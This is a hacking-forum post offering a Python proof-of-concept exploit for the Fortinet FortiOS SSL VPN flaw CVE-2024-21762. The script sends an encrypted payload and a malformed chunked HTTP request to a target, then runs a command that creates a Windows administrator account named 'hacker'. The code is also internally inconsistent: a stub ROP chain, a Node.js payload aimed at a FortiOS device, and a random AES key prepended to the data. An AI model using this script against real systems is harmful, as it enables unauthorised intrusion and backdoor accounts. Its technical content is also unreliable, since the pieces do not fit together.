RCE, FortiOS & FortiProxy, CVE-2024-21762

rootty

rootty

Active member
Пользователь
Регистрация
1 Фев 2025
Сообщения
25
Реакции
4
CVE-2024-21762 POC (Fortinet SSL VPN) out-of-bound vulnerability

Python: 
import  socket
 import  time
 import  random
 import  struct
 from  Crypto . Cipher  import  AES

TARGET  =  'xxxxxxxxxxxx'
PORT  =  443

def  establish_connection ( target ,  port ):
    """Establishes a connection to the target server."""
    sock  =  socket . socket ( socket . AF_INET ,  socket . SOCK_STREAM )
    sock . connect (( target ,  port ))
    return  sock

 def  send_payload ( payload ,  target ,  port ):
    """Sends the payload over the established connection."""
    with  establish_connection ( target ,  port )  as  sock :
        sock . sendall ( payload )

def  generate_rop_chain ():
    """Generates a tailored ROP chain to exploit specific vulnerabilities."""
    rop_chain  =  b "\x90\x90\x90..."   # Replace with custom ROP chain bytes
    return  rop_chain

 def  generate_js_payload ( command ):
    """Crafts a JavaScript payload to execute arbitrary commands."""
    js_payload  =  f '(function(){{var cp=require("child_process");cp.execSync("{command}");}})();'
    return  js_payload . encode ()

def  encrypt_payload ( payload ):
    """Encrypts the payload using AES encryption."""
    key  =  b "" . join ([ struct . pack ( "B" ,  random . randint ( 0 ,  255 ))  for  _  in  range ( 16 )])
    cipher  =  AES . new ( key ,  AES . MODE_CBC ,  IV = b "" . join ([ struct . pack ( "B" ,  random . randint ( 0 ,  255 ))  for  _  in  range ( 16 )]))
    padded_payload  =  payload  +  b "\x00"  *  ( 16  -  len ( payload )  %  16 )
    encrypted_payload  =  cipher . encrypt ( padded_payload )
    return  key  +  encrypted_payload

 def  execute_exploit ( command ):
    """Executes the exploit by generating, encrypting, and sending the payload."""
    rop_chain  =  generate_rop_chain ()
    js_payload  =  generate_js_payload ( command )
    encrypted_payload  =  encrypt_payload ( rop_chain  +  js_payload )

    data   =  b "POST /remote/hostcheck_validate HTTP/1.1\r\n"
    data  +=  b "Host: "  +  TARGET . encode ()  +  b "\r\n"
    data  +=  b "Content-Length: "  +  str ( len ( encrypted_payload )). encode ()  +  b "\r\n"
    data  +=  b "\r\n"
    data  +=  encrypted_payload

    send_payload ( data ,  TARGET ,  PORT )

    time . sleep ( 2 )

    data   =  b "POST / HTTP/1.1\r\n"
    data  +=  b "Host: "  +  TARGET . encode ()  +  b "\r\n"
    data  +=  b "Transfer-Encoding: chunked\r\n"
    data  +=  b "\r\n"
    data  +=  b "0" * 4137  +  b "\0"
    data  +=  b "A" * 1  +  b "\r\n\r\n"

    send_payload ( data ,  TARGET ,  PORT )

def  main ():
    command  =  'net user hacker password123 /add && net localgroup Administrators hacker /add'
    execute_exploit ( command )

if  __name__  ==  "__main__" :
    main ()
 
Войдите или зарегистрируйтесь для ответа.
Сверху